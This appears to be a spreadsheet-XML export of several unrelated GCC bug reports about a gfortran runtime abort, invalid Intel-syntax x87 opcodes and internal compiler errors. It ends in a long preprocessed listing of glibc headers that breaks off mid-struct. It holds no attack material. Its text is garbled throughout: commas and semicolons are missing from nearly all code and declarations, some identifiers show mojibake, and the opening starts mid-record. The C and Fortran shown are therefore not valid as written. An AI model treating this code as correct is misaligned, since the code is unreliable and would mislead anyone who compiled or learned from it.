extern inline fixed ftofix (double x) { if (x &gt; 32767.0) { *allegro_errno = 34 return 0x7FFFFFFF } if (x &lt; -32767.0) { *allegro_errno = 34 return -0x7FFFFFFF } return (long)(x * 65536.0 + (x &lt; 0 ? -0.5 : 0.5)) }
extern inline double fixtof (fixed x) { return (double)x / 65536.0 }
extern inline fixed fixdiv (fixed x fixed y) { if (y == 0) { *allegro_errno = 34 return (x &lt; 0) ? -0x7FFFFFFF : 0x7FFFFFFF } else return ftofix(fixtof(x) / fixtof(y)) }
extern inline fixed itofix (int x) { return x &lt;&lt; 16 }
int foo(int n) { return fixtoi(fixdiv(itofix(512) itofix(n))) }
--------------------8&lt; bug.c 8&lt;-------------------</t>
  </si>
  <si>
    <t>GCC-25307</t>
  </si>
  <si>
    <t>internal read with end=label aborts</t>
  </si>
  <si>
    <t>Hi!
The following program 
program test
   character(len=10) :: str
   str = '123'
   read( str * end=10 ) ix
10 continue
   print*i
end program test
aborts at runtime with somewhat unexpected  message 
gfortran -v -o file file.f90 ./file
Driving: gfortran -v -o file file.f90 -lgfortranbegin -lgfortran -lm -shared-libgcc
Using built-in specs.
Target: i386-linux
Configured with: ../gcc/configure --prefix=/tmp/gfortran-20051205/irun --enable-languages=cfortran --host=i386-linux
Thread model: posix
gcc version 4.2.0 20051205 (experimental)
 /home/wrk/jpr/irun/bin/../libexec/gcc/i386-linux/4.2.0/f951 file.f90 -quiet -dumpbase file.f90 -auxbase file -version -o /tmp/ccuEHGgN.s
GNU F95 version 4.2.0 20051205 (experimental) (i386-linux)
        compiled by GNU C version 4.0.2 (Debian 4.0.2-2).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
 as -V -Qy -o /tmp/ccqaQsjs.o /tmp/ccuEHGgN.s
GNU assembler version 2.13.90.0.18 (i386-redhat-linux) using BFD version 2.13.90.0.18 20030206
 /home/wrk/jpr/irun/bin/../libexec/gcc/i386-linux/4.2.0/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o file /usr/lib/crt1.o /usr/lib/crti.o /home/wrk/jpr/irun/bin/../lib/gcc/i386-linux/4.2.0/crtbegin.o -L/home/wrk/jpr/irun/bin/../lib/gcc/i386-linux/4.2.0 -L/home/wrk/jpr/irun/bin/../lib/gcc -L/home/wrk/jpr/irun/bin/../lib/gcc/i386-linux/4.2.0/../../.. /tmp/ccqaQsjs.o -lgfortranbegin -lgfortran -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /home/wrk/jpr/irun/bin/../lib/gcc/i386-linux/4.2.0/crtend.o /usr/lib/crtn.o
At line 4 of file file.f90
Fortran runtime error: Success
ifort g95 sun f90 pgf90 pathf90 xlf90 all treat the end specfier
as i would expect...
Juha</t>
  </si>
  <si>
    <t>GCC-5760</t>
  </si>
  <si>
    <t>-masm=intel [a.k.a. -mintel-syntax] generates incorrect x87 code</t>
  </si>
  <si>
    <t>When using -mintel-syntax (changed to -masm=intel for 3.1).  It generates x87 opcodes that are illegal by appending the att-style length suffix.  Some older versions of as included with GNU binutils accepted these illegal opcodes but the current released and CVS versions of will not.
For example on one of my programs if outputs this:
rate.s.orig: Assembler messages:
rate.s.orig:1455: Error: no such instruction: `fldl QWORD PTR LC20'
rate.s.orig:1461: Error: no such instruction: `fstpl QWORD PTR[ebp-32]'
rate.s.orig:1472: Error: no such instruction: `fldl QWORD PTR[ebp-32]'
rate.s.orig:1475: Error: no such instruction: `fstpl QWORD PTR[ebp-32]'
...
Release:
gcc version 3.1 20020222 (experimental)
Environment:
Any Intel x86 compatible platform with x87 support.
How-To-Repeat:
On an Intel platform with binutils 2.11.x run GCC's 
make check RUNTESTFLAGS=--tool_opts 'masm=intel'
Illegal opcodes will occur during most of the floating point tests.</t>
  </si>
  <si>
    <t>GCC-66314</t>
  </si>
  <si>
    <t>[6 Regression] ice in verify_loop_structure</t>
  </si>
  <si>
    <t>Created attachment 35637
C source code
For trunk gcc dated 20150527
crypto/asymmetric_keys/pkcs7_trust.c: In function â€˜pkcs7_validate_trustâ€™:
crypto/asymmetric_keys/pkcs7_trust.c:168:5: error: size of loop 2 should be 36 not 38
 int pkcs7_validate_trust(struct pkcs7_message *pkcs7
     ^
crypto/asymmetric_keys/pkcs7_trust.c:168:5: internal compiler error: in verify_loop_structure at cfgloop.c:1662
0x7166e3 verify_loop_structure()
	../../src/trunk/gcc/cfgloop.c:1662
0xa13f47 loop_optimizer_init(unsigned int)
	../../src/trunk/gcc/loop-init.c:124
0xe4a53a execute_vrp
	../../src/trunk/gcc/tree-vrp.c:10377
0xe4a53a execute
	../../src/trunk/gcc/tree-vrp.c:10474
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Flags -std=gnu89 -Os -fprofile-arcs -fsanitize=kernel-address
required. Code derived from Linux kernel so probably quite important.</t>
  </si>
  <si>
    <t>GCC-6845</t>
  </si>
  <si>
    <t>ICE with -O -march=pentium3/pentium2/athlon</t>
  </si>
  <si>
    <t>I found this when trying to compile lbreakout 2.2.2
It only triggers when using -O or higher together with -march=pentium3 -march=pentium2 or -march=athlon (and perhaps others)
a.c: In function `circle_intersect':
a.c:10: Internal compiler error in ix86_secondary_memory_needed at config/i386/i386.c:13513
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I'm not sure if
Vector delta = { pos.x - m.x pos.y - m.y }
is legal but it doesn't generate any warnings.
Release:
gcc version 3.2 20020527 (experimental)
Environment:
Mandrake 8.2 x86
Configured with: ../gcc/configure --prefix=/usr/local/gcc/ --enable-languages=c</t>
  </si>
  <si>
    <t>torbjorn.wassberg</t>
  </si>
  <si>
    <t>GCC-15114</t>
  </si>
  <si>
    <t>[3.4 regression] -funit-at-a-time causes compilation of functions with variable length arrays to fail</t>
  </si>
  <si>
    <t xml:space="preserve">Compiling matrix.c (matrix.i is included below) failed with -O2. I've narrowed
it down to the fact that -funit-at-a-time triggers the bug (-O2
-fno-unit-at-a-time does not trigger the bug).
gcc -v (from slackware/testing):
Reading specs from /usr/lib/gcc/i486-slackware-linux/3.4.0/specs
Configured with: ../gcc-3.4.0/configure --prefix=/usr --enable-shared
--enable-threads=posix --enable-__cxa_atexit --disable-checking --with-gnu-ld
--verbose --target=i486-slackware-linux --host=i486-slackware-linux
Thread model: posix
gcc version 3.4.0
Command line that produces the bug:
gcc -Wall -funit-at-a-time -c matrix.c
Compiler errors generated:
matrix.c: In function `mat_unity':
matrix.c:106: error: prior parameter's size depends on 'n'
matrix.c:106: error: prior parameter's size depends on 'n'
matrix.c:106: error: prior parameter's size depends on 'n'
matrix.c:106: error: prior parameter's size depends on 'n'
matrix.c:120: error: prior parameter's size depends on 'n'
matrix.c:120: error: prior parameter's size depends on 'n'
matrix.c:120: error: prior parameter's size depends on 'n'
matrix.c:120: error: prior parameter's size depends on 'n'
matrix.c:134: error: prior parameter's size depends on 'n'
matrix.c:134: error: prior parameter's size depends on 'n'
matrix.c:134: error: prior parameter's size depends on 'n'
matrix.c:134: error: prior parameter's size depends on 'n'
matrix.c:134: error: prior parameter's size depends on 'n'
matrix.c:134: error: prior parameter's size depends on 'n'
matrix.c:153: error: prior parameter's size depends on 'n'
matrix.c:153: error: prior parameter's size depends on 'n'
matrix.c:153: error: prior parameter's size depends on 'n'
matrix.c:153: error: prior parameter's size depends on 'n'
matrix.c:212: error: prior parameter's size depends on 'n'
matrix.c:212: error: prior parameter's size depends on 'n'
matrix.c:114: confused by earlier errors bailing out
matrix.i pre-processed matrix.c:
/*------------------- matrix.i -------------------*/
# 1 matrix.c
# 1 
# 1 
# 1 matrix.c
# 44 matrix.c
# 1 /usr/include/assert.h 1 3 4
# 36 /usr/include/assert.h 3 4
# 1 /usr/include/features.h 1 3 4
# 291 /usr/include/features.h 3 4
# 1 /usr/include/sys/cdefs.h 1 3 4
# 292 /usr/include/features.h 2 3 4
# 314 /usr/include/features.h 3 4
# 1 /usr/include/gnu/stubs.h 1 3 4
# 315 /usr/include/features.h 2 3 4
# 37 /usr/include/assert.h 2 3 4
# 65 /usr/include/assert.h 3 4
extern void __assert_fail (__const char *__assertion __const char *__file
      unsigned int __line __const char *__function)
     __attribute__ ((__noreturn__))
extern void __assert_perror_fail (int __errnum __const char *__file
      unsigned int __line
      __const char *__function)
     __attribute__ ((__noreturn__))
extern void __assert (const char *__assertion const char *__file int __line)
     __attribute__ ((__noreturn__))
# 45 matrix.c 2
# 1 /usr/include/stdio.h 1 3 4
# 30 /usr/include/stdio.h 3 4
# 1 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 1 3 4
# 213 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 3 4
typedef unsigned int size_t
# 35 /usr/include/stdio.h 2 3 4
# 1 /usr/include/bits/types.h 1 3 4
# 28 /usr/include/bits/types.h 3 4
# 1 /usr/include/bits/wordsize.h 1 3 4
# 29 /usr/include/bits/types.h 2 3 4
# 1 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 1 3 4
# 32 /usr/include/bits/types.h 2 3 4
typedef unsigned char __u_char
typedef unsigned short int __u_short
typedef unsigned int __u_int
typedef unsigned long int __u_long
typedef signed char __int8_t
typedef unsigned char __uint8_t
typedef signed short int __int16_t
typedef unsigned short int __uint16_t
typedef signed int __int32_t
typedef unsigned int __uint32_t
__extension__ typedef signed long long int __int64_t
__extension__ typedef unsigned long long int __uint64_t
__extension__ typedef long long int __quad_t
__extension__ typedef unsigned long long int __u_quad_t
# 128 /usr/include/bits/types.h 3 4
# 1 /usr/include/bits/typesizes.h 1 3 4
# 129 /usr/include/bits/types.h 2 3 4
typedef unsigned long long int __dev_t
typedef unsigned int __uid_t
typedef unsigned int __gid_t
typedef unsigned long int __ino_t
typedef unsigned long long int __ino64_t
typedef unsigned int __mode_t
typedef unsigned int __nlink_t
typedef long int __off_t
typedef long long int __off64_t
typedef int __pid_t
typedef struct { int __val[2] } __fsid_t
typedef long int __clock_t
typedef unsigned long int __rlim_t
typedef unsigned long long int __rlim64_t
typedef unsigned int __id_t
typedef long int __time_t
typedef unsigned int __useconds_t
typedef long int __suseconds_t
typedef int __daddr_t
typedef long int __swblk_t
typedef int __key_t
typedef int __clockid_t
typedef int __timer_t
typedef long int __blksize_t
typedef long int __blkcnt_t
typedef long long int __blkcnt64_t
typedef unsigned long int __fsblkcnt_t
typedef unsigned long long int __fsblkcnt64_t
typedef unsigned long int __fsfilcnt_t
typedef unsigned long long int __fsfilcnt64_t
typedef int __ssize_t
typedef __off64_t __loff_t
typedef __quad_t *__qaddr_t
typedef char *__caddr_t
typedef int __intptr_t
typedef unsigned int __socklen_t
# 37 /usr/include/stdio.h 2 3 4
typedef struct _IO_FILE FILE
# 62 /usr/include/stdio.h 3 4
typedef struct _IO_FILE __FILE
# 72 /usr/include/stdio.h 3 4
# 1 /usr/include/libio.h 1 3 4
# 32 /usr/include/libio.h 3 4
# 1 /usr/include/_G_config.h 1 3 4
# 14 /usr/include/_G_config.h 3 4
# 1 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 1 3 4
# 325 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 3 4
typedef long int wchar_t
# 354 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 3 4
typedef unsigned int wint_t
# 15 /usr/include/_G_config.h 2 3 4
# 24 /usr/include/_G_config.h 3 4
# 1 /usr/include/wchar.h 1 3 4
# 48 /usr/include/wchar.h 3 4
# 1 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 1 3 4
# 49 /usr/include/wchar.h 2 3 4
# 1 /usr/include/bits/wchar.h 1 3 4
# 51 /usr/include/wchar.h 2 3 4
# 71 /usr/include/wchar.h 3 4
typedef struct
{
  int __count
  union
  {
    wint_t __wch
    char __wchb[4]
  } __value
} __mbstate_t
# 25 /usr/include/_G_config.h 2 3 4
typedef struct
{
  __off_t __pos
  __mbstate_t __state
} _G_fpos_t
typedef struct
{
  __off64_t __pos
  __mbstate_t __state
} _G_fpos64_t
# 44 /usr/include/_G_config.h 3 4
# 1 /usr/include/gconv.h 1 3 4
# 28 /usr/include/gconv.h 3 4
# 1 /usr/include/wchar.h 1 3 4
# 48 /usr/include/wchar.h 3 4
# 1 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 1 3 4
# 49 /usr/include/wchar.h 2 3 4
# 29 /usr/include/gconv.h 2 3 4
# 1 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 1 3 4
# 32 /usr/include/gconv.h 2 3 4
enum
{
  __GCONV_OK = 0
  __GCONV_NOCONV
  __GCONV_NODB
  __GCONV_NOMEM
  __GCONV_EMPTY_INPUT
  __GCONV_FULL_OUTPUT
  __GCONV_ILLEGAL_INPUT
  __GCONV_INCOMPLETE_INPUT
  __GCONV_ILLEGAL_DESCRIPTOR
  __GCONV_INTERNAL_ERROR
}
enum
{
  __GCONV_IS_LAST = 0x0001
  __GCONV_IGNORE_ERRORS = 0x0002
}
struct __gconv_step
struct __gconv_step_data
struct __gconv_loaded_object
struct __gconv_trans_data
typedef int (*__gconv_fct) (struct __gconv_step * struct __gconv_step_data *
       __const unsigned char ** __const unsigned char *
       unsigned char ** size_t * int int)
typedef wint_t (*__gconv_btowc_fct) (struct __gconv_step * unsigned char)
typedef int (*__gconv_init_fct) (struct __gconv_step *)
typedef void (*__gconv_end_fct) (struct __gconv_step *)
typedef int (*__gconv_trans_fct) (struct __gconv_step *
      struct __gconv_step_data * void *
      __const unsigned char *
      __const unsigned char **
      __const unsigned char * unsigned char **
      size_t *)
typedef int (*__gconv_trans_context_fct) (void * __const unsigned char *
       __const unsigned char *
       unsigned char * unsigned char *)
typedef int (*__gconv_trans_query_fct) (__const char * __const char ***
     size_t *)
typedef int (*__gconv_trans_init_fct) (void ** const char *)
typedef void (*__gconv_trans_end_fct) (void *)
struct __gconv_trans_data
{
  __gconv_trans_fct __trans_fct
  __gconv_trans_context_fct __trans_context_fct
  __gconv_trans_end_fct __trans_end_fct
  void *__data
  struct __gconv_trans_data *__next
}
struct __gconv_step
{
  struct __gconv_loaded_object *__shlib_handle
  __const char *__modname
  int __counter
  char *__from_name
  char *__to_name
  __gconv_fct __fct
  __gconv_btowc_fct __btowc_fct
  __gconv_init_fct __init_fct
  __gconv_end_fct __end_fct
  int __min_needed_from
  int __max_needed_from
  int __min_needed_to
  int __max_needed_to
  int __stateful
  void *__data
}
struct __gconv_step_data
{
  unsigned char *__outbuf
  unsigned char *__outbufend
  int __flags
  int __invocation_counter
  int __internal_use
  __mbstate_t *__statep
  __mbstate_t __state
  struct __gconv_trans_data *__trans
}
typedef struct __gconv_info
{
  size_t __nsteps
  struct __gconv_step *__steps
  __extension__ struct __gconv_step_data __data []
} *__gconv_t
# 45 /usr/include/_G_config.h 2 3 4
typedef union
{
  struct __gconv_info __cd
  struct
  {
    struct __gconv_info __cd
    struct __gconv_step_data __data
  } __combined
} _G_iconv_t
typedef int _G_int16_t __attribute__ ((__mode__ (__HI__)))
typedef int _G_int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int _G_uint16_t __attribute__ ((__mode__ (__HI__)))
typedef unsigned int _G_uint32_t __attribute__ ((__mode__ (__SI__)))
# 33 /usr/include/libio.h 2 3 4
# 53 /usr/include/libio.h 3 4
# 1 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stdarg.h 1 3 4
# 43 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stdarg.h 3 4
typedef __builtin_va_list __gnuc_va_list
# 54 /usr/include/libio.h 2 3 4
# 162 /usr/include/libio.h 3 4
struct _IO_jump_t struct _IO_FILE
# 172 /usr/include/libio.h 3 4
typedef void _IO_lock_t
struct _IO_marker {
  struct _IO_marker *_next
  struct _IO_FILE *_sbuf
  int _pos
# 195 /usr/include/libio.h 3 4
}
enum __codecvt_result
{
  __codecvt_ok
  __codecvt_partial
  __codecvt_error
  __codecvt_noconv
}
# 263 /usr/include/libio.h 3 4
struct _IO_FILE {
  int _flags
  char* _IO_read_ptr
  char* _IO_read_end
  char* _IO_read_base
  char* _IO_write_base
  char* _IO_write_ptr
  char* _IO_write_end
  char* _IO_buf_base
  char* _IO_buf_end
  char *_IO_save_base
  char *_IO_backup_base
  char *_IO_save_end
  struct _IO_marker *_markers
  struct _IO_FILE *_chain
  int _fileno
  int _flags2
  __off_t _old_offset
  unsigned short _cur_column
  signed char _vtable_offset
  char _shortbuf[1]
  _IO_lock_t *_lock
# 311 /usr/include/libio.h 3 4
  __off64_t _offset
  void *__pad1
  void *__pad2
  int _mode
  char _unused2[15 * sizeof (int) - 2 * sizeof (void *)]
}
typedef struct _IO_FILE _IO_FILE
struct _IO_FILE_plus
extern struct _IO_FILE_plus _IO_2_1_stdin_
extern struct _IO_FILE_plus _IO_2_1_stdout_
extern struct _IO_FILE_plus _IO_2_1_stderr_
# 350 /usr/include/libio.h 3 4
typedef __ssize_t __io_read_fn (void *__cookie char *__buf size_t __nbytes)
typedef __ssize_t __io_write_fn (void *__cookie __const char *__buf
     size_t __n)
typedef int __io_seek_fn (void *__cookie __off64_t *__pos int __w)
typedef int __io_close_fn (void *__cookie)
# 402 /usr/include/libio.h 3 4
extern int __underflow (_IO_FILE *) 
extern int __uflow (_IO_FILE *) 
extern int __overflow (_IO_FILE * int) 
extern wint_t __wunderflow (_IO_FILE *) 
extern wint_t __wuflow (_IO_FILE *) 
extern wint_t __woverflow (_IO_FILE * wint_t) 
# 432 /usr/include/libio.h 3 4
extern int _IO_getc (_IO_FILE *__fp) 
extern int _IO_putc (int __c _IO_FILE *__fp) 
extern int _IO_feof (_IO_FILE *__fp) 
extern int _IO_ferror (_IO_FILE *__fp) 
extern int _IO_peekc_locked (_IO_FILE *__fp) 
extern void _IO_flockfile (_IO_FILE *) 
extern void _IO_funlockfile (_IO_FILE *) 
extern int _IO_ftrylockfile (_IO_FILE *) 
# 462 /usr/include/libio.h 3 4
extern int _IO_vfscanf (_IO_FILE * __restrict const char * __restrict
   __gnuc_va_list int *__restrict) 
extern int _IO_vfprintf (_IO_FILE *__restrict const char *__restrict
    __gnuc_va_list) 
extern __ssize_t _IO_padn (_IO_FILE * int __ssize_t) 
extern size_t _IO_sgetn (_IO_FILE * void * size_t) 
extern __off64_t _IO_seekoff (_IO_FILE * __off64_t int int) 
extern __off64_t _IO_seekpos (_IO_FILE * __off64_t int) 
extern void _IO_free_backup_area (_IO_FILE *) 
# 73 /usr/include/stdio.h 2 3 4
# 86 /usr/include/stdio.h 3 4
typedef _G_fpos_t fpos_t
# 138 /usr/include/stdio.h 3 4
# 1 /usr/include/bits/stdio_lim.h 1 3 4
# 139 /usr/include/stdio.h 2 3 4
extern struct _IO_FILE *stdin
extern struct _IO_FILE *stdout
extern struct _IO_FILE *stderr
extern int remove (__const char *__filename) 
extern int rename (__const char *__old __const char *__new) 
extern FILE *tmpfile (void) 
# 171 /usr/include/stdio.h 3 4
extern char *tmpnam (char *__s) 
# 181 /usr/include/stdio.h 3 4
extern char *tmpnam_r (char *__s) 
# 193 /usr/include/stdio.h 3 4
extern char *tempnam (__const char *__dir __const char *__pfx)
     __attribute__ ((__malloc__))
extern int fclose (FILE *__stream) 
extern int fflush (FILE *__stream) 
extern int fflush_unlocked (FILE *__stream) 
# 216 /usr/include/stdio.h 3 4
extern FILE *fopen (__const char *__restrict __filename
      __const char *__restrict __modes) 
extern FILE *freopen (__const char *__restrict __filename
        __const char *__restrict __modes
        FILE *__restrict __stream) 
# 239 /usr/include/stdio.h 3 4
# 250 /usr/include/stdio.h 3 4
extern FILE *fdopen (int __fd __const char *__modes) 
# 271 /usr/include/stdio.h 3 4
extern void setbuf (FILE *__restrict __stream char *__restrict __buf) 
extern int setvbuf (FILE *__restrict __stream char *__restrict __buf
      int __modes size_t __n) 
extern void setbuffer (FILE *__restrict __stream char *__restrict __buf
         size_t __size) 
extern void setlinebuf (FILE *__stream) 
extern int fprintf (FILE *__restrict __stream
      __const char *__restrict __format ...) 
extern int printf (__const char *__restrict __format ...) 
extern int sprintf (char *__restrict __s
      __const char *__restrict __format ...) 
extern int vfprintf (FILE *__restrict __s __const char *__restrict __format
       __gnuc_va_list __arg) 
extern int vprintf (__const char *__restrict __format __gnuc_va_list __arg)
extern int vsprintf (char *__restrict __s __const char *__restrict __format
       __gnuc_va_list __arg) 
extern int snprintf (char *__restrict __s size_t __maxlen
       __const char *__restrict __format ...)
     __attribute__ ((__format__ (__printf__ 3 4)))
extern int vsnprintf (char *__restrict __s size_t __maxlen
        __const char *__restrict __format __gnuc_va_list __arg)
     __attribute__ ((__format__ (__printf__ 3 0)))
# 349 /usr/include/stdio.h 3 4
extern int fscanf (FILE *__restrict __stream
     __const char *__restrict __format ...) 
extern int scanf (__const char *__restrict __format ...) 
extern int sscanf (__const char *__restrict __s
     __const char *__restrict __format ...) 
# 379 /usr/include/stdio.h 3 4
extern int fgetc (FILE *__stream) 
extern int getc (FILE *__stream) 
extern int getchar (void) 
extern int getc_unlocked (FILE *__stream) 
extern int getchar_unlocked (void) 
extern int fgetc_unlocked (FILE *__stream) 
extern int fputc (int __c FILE *__stream) 
extern int putc (int __c FILE *__stream) 
extern int putchar (int __c) 
extern int fputc_unlocked (int __c FILE *__stream) 
extern int putc_unlocked (int __c FILE *__stream) 
extern int putchar_unlocked (int __c) 
extern int getw (FILE *__stream) 
extern int putw (int __w FILE *__stream) 
extern char *fgets (char *__restrict __s int __n FILE *__restrict __stream)
extern char *gets (char *__s) 
# 475 /usr/include/stdio.h 3 4
extern int fputs (__const char *__restrict __s FILE *__restrict __stream)
extern int puts (__const char *__s) 
extern int ungetc (int __c FILE *__stream) 
extern size_t fread (void *__restrict __ptr size_t __size
       size_t __n FILE *__restrict __stream) 
extern size_t fwrite (__const void *__restrict __ptr size_t __size
        size_t __n FILE *__restrict __s) 
# 504 /usr/include/stdio.h 3 4
extern size_t fread_unlocked (void *__restrict __ptr size_t __size
         size_t __n FILE *__restrict __stream) 
extern size_t fwrite_unlocked (__const void *__restrict __ptr size_t __size
          size_t __n FILE *__restrict __stream) 
extern int fseek (FILE *__stream long int __off int __whence) 
extern long int ftell (FILE *__stream) 
extern void rewind (FILE *__stream) 
# 544 /usr/include/stdio.h 3 4
extern int fgetpos (FILE *__restrict __stream fpos_t *__restrict __pos)
extern int fsetpos (FILE *__stream __const fpos_t *__pos) 
# 563 /usr/include/stdio.h 3 4
# 573 /usr/include/stdio.h 3 4
extern void clearerr (FILE *__stream) 
extern int feof (FILE *__stream) 
extern int ferror (FILE *__stream) 
extern void clearerr_unlocked (FILE *__stream) 
extern int feof_unlocked (FILE *__stream) 
extern int ferror_unlocked (FILE *__stream) 
extern void perror (__const char *__s) 
# 1 /usr/include/bits/sys_errlist.h 1 3 4
# 27 /usr/include/bits/sys_errlist.h 3 4
extern int sys_nerr
extern __const char *__const sys_errlist[]
# 600 /usr/include/stdio.h 2 3 4
extern int fileno (FILE *__stream) 
extern int fileno_unlocked (FILE *__stream) 
extern FILE *popen (__const char *__command __const char *__modes) 
extern int pclose (FILE *__stream) 
extern char *ctermid (char *__s) 
# 653 /usr/include/stdio.h 3 4
extern void flockfile (FILE *__stream) 
extern int ftrylockfile (FILE *__stream) 
extern void funlockfile (FILE *__stream) 
# 677 /usr/include/stdio.h 3 4
# 46 matrix.c 2
# 1 /usr/include/stdlib.h 1 3 4
# 33 /usr/include/stdlib.h 3 4
# 1 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 1 3 4
# 34 /usr/include/stdlib.h 2 3 4
# 93 /usr/include/stdlib.h 3 4
typedef struct
  {
    int quot
    int rem
  } div_t
typedef struct
  {
    long int quot
    long int rem
  } ldiv_t
# 137 /usr/include/stdlib.h 3 4
extern size_t __ctype_get_mb_cur_max (void) 
extern double atof (__const char *__nptr) __attribute__ ((__pure__))
extern int atoi (__const char *__nptr) __attribute__ ((__pure__))
extern long int atol (__const char *__nptr) __attribute__ ((__pure__))
__extension__ extern long long int atoll (__const char *__nptr)
     __attribute__ ((__pure__))
extern double strtod (__const char *__restrict __nptr
        char **__restrict __endptr) 
# 174 /usr/include/stdlib.h 3 4
extern long int strtol (__const char *__restrict __nptr
   char **__restrict __endptr int __base) 
extern unsigned long int strtoul (__const char *__restrict __nptr
      char **__restrict __endptr int __base)
__extension__
extern long long int strtoq (__const char *__restrict __nptr
        char **__restrict __endptr int __base) 
__extension__
extern unsigned long long int strtouq (__const char *__restrict __nptr
           char **__restrict __endptr int __base)
__extension__
extern long long int strtoll (__const char *__restrict __nptr
         char **__restrict __endptr int __base) 
__extension__
extern unsigned long long int strtoull (__const char *__restrict __nptr
     char **__restrict __endptr int __base)
# 264 /usr/include/stdlib.h 3 4
extern double __strtod_internal (__const char *__restrict __nptr
     char **__restrict __endptr int __group)
extern float __strtof_internal (__const char *__restrict __nptr
    char **__restrict __endptr int __group)
extern long double __strtold_internal (__const char *__restrict __nptr
           char **__restrict __endptr
           int __group) 
extern long int __strtol_internal (__const char *__restrict __nptr
       char **__restrict __endptr
       int __base int __group) 
extern unsigned long int __strtoul_internal (__const char *__restrict __nptr
          char **__restrict __endptr
          int __base int __group) 
__extension__
extern long long int __strtoll_internal (__const char *__restrict __nptr
      char **__restrict __endptr
      int __base int __group) 
__extension__
extern unsigned long long int __strtoull_internal (__const char *
         __restrict __nptr
         char **__restrict __endptr
         int __base int __group)
# 408 /usr/include/stdlib.h 3 4
extern char *l64a (long int __n) 
extern long int a64l (__const char *__s) __attribute__ ((__pure__))
# 1 /usr/include/sys/types.h 1 3 4
# 29 /usr/include/sys/types.h 3 4
typedef __u_char u_char
typedef __u_short u_short
typedef __u_int u_int
typedef __u_long u_long
typedef __quad_t quad_t
typedef __u_quad_t u_quad_t
typedef __fsid_t fsid_t
typedef __loff_t loff_t
typedef __ino_t ino_t
# 62 /usr/include/sys/types.h 3 4
typedef __dev_t dev_t
typedef __gid_t gid_t
typedef __mode_t mode_t
typedef __nlink_t nlink_t
typedef __uid_t uid_t
typedef __off_t off_t
# 100 /usr/include/sys/types.h 3 4
typedef __pid_t pid_t
typedef __id_t id_t
typedef __ssize_t ssize_t
typedef __daddr_t daddr_t
typedef __caddr_t caddr_t
typedef __key_t key_t
# 133 /usr/include/sys/types.h 3 4
# 1 /usr/include/time.h 1 3 4
# 74 /usr/include/time.h 3 4
typedef __time_t time_t
# 92 /usr/include/time.h 3 4
typedef __clockid_t clockid_t
# 104 /usr/include/time.h 3 4
typedef __timer_t timer_t
# 134 /usr/include/sys/types.h 2 3 4
# 147 /usr/include/sys/types.h 3 4
# 1 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 1 3 4
# 148 /usr/include/sys/types.h 2 3 4
typedef unsigned long int ulong
typedef unsigned short int ushort
typedef unsigned int uint
# 191 /usr/include/sys/types.h 3 4
typedef int int8_t __attribute__ ((__mode__ (__QI__)))
typedef int int16_t __attribute__ ((__mode__ (__HI__)))
typedef int int32_t __attribute__ ((__mode__ (__SI__)))
typedef int int64_t __attribute__ ((__mode__ (__DI__)))
typedef unsigned int u_int8_t __attribute__ ((__mode__ (__QI__)))
typedef unsigned int u_int16_t __attribute__ ((__mode__ (__HI__)))
typedef unsigned int u_int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int u_int64_t __attribute__ ((__mode__ (__DI__)))
typedef int register_t __attribute__ ((__mode__ (__word__)))
# 213 /usr/include/sys/types.h 3 4
# 1 /usr/include/endian.h 1 3 4
# 37 /usr/include/endian.h 3 4
# 1 /usr/include/bits/endian.h 1 3 4
# 38 /usr/include/endian.h 2 3 4
# 214 /usr/include/sys/types.h 2 3 4
# 1 /usr/include/sys/select.h 1 3 4
# 31 /usr/include/sys/select.h 3 4
# 1 /usr/include/bits/select.h 1 3 4
# 32 /usr/include/sys/select.h 2 3 4
# 1 /usr/include/bits/sigset.h 1 3 4
# 23 /usr/include/bits/sigset.h 3 4
typedef int __sig_atomic_t
typedef struct
  {
    unsigned long int __val[(1024 / (8 * sizeof (unsigned long int)))]
  } __sigset_t
# 35 /usr/include/sys/select.h 2 3 4
typedef __sigset_t sigset_t
# 1 /usr/include/time.h 1 3 4
# 118 /usr/include/time.h 3 4
struct timespec
  {
    __time_t tv_sec
    long int tv_nsec
  }
# 45 /usr/include/sys/select.h 2 3 4
# 1 /usr/include/bits/time.h 1 3 4
# 67 /usr/include/bits/time.h 3 4
struct timeval
  {
    __time_t tv_sec
    __suseconds_t tv_usec
  }
# 47 /usr/include/sys/select.h 2 3 4
typedef __suseconds_t suseconds_t
typedef long int __fd_mask
# 67 /usr/include/sys/select.h 3 4
typedef struct
  {
    __fd_mask __fds_bits[1024 / (8 * sizeof (__fd_mask))]
  } fd_set
typedef __fd_mask fd_mask
# 99 /usr/include/sys/select.h 3 4
extern int select (int __nfds fd_set *__restrict __readfds
     fd_set *__restrict __writefds
     fd_set *__restrict __exceptfds
     struct timeval *__restrict __timeout) 
# 122 /usr/include/sys/select.h 3 4
# 217 /usr/include/sys/types.h 2 3 4
# 1 /usr/include/sys/sysmacros.h 1 3 4
# 220 /usr/include/sys/types.h 2 3 4
# 231 /usr/include/sys/types.h 3 4
typedef __blkcnt_t blkcnt_t
typedef __fsblkcnt_t fsblkcnt_t
typedef __fsfilcnt_t fsfilcnt_t
# 266 /usr/include/sys/types.h 3 4
# 1 /usr/include/bits/pthreadtypes.h 1 3 4
# 23 /usr/include/bits/pthreadtypes.h 3 4
# 1 /usr/include/bits/sched.h 1 3 4
# 83 /usr/include/bits/sched.h 3 4
struct __sched_param
  {
    int __sched_priority
  }
# 24 /usr/include/bits/pthreadtypes.h 2 3 4
struct _pthread_fastlock
{
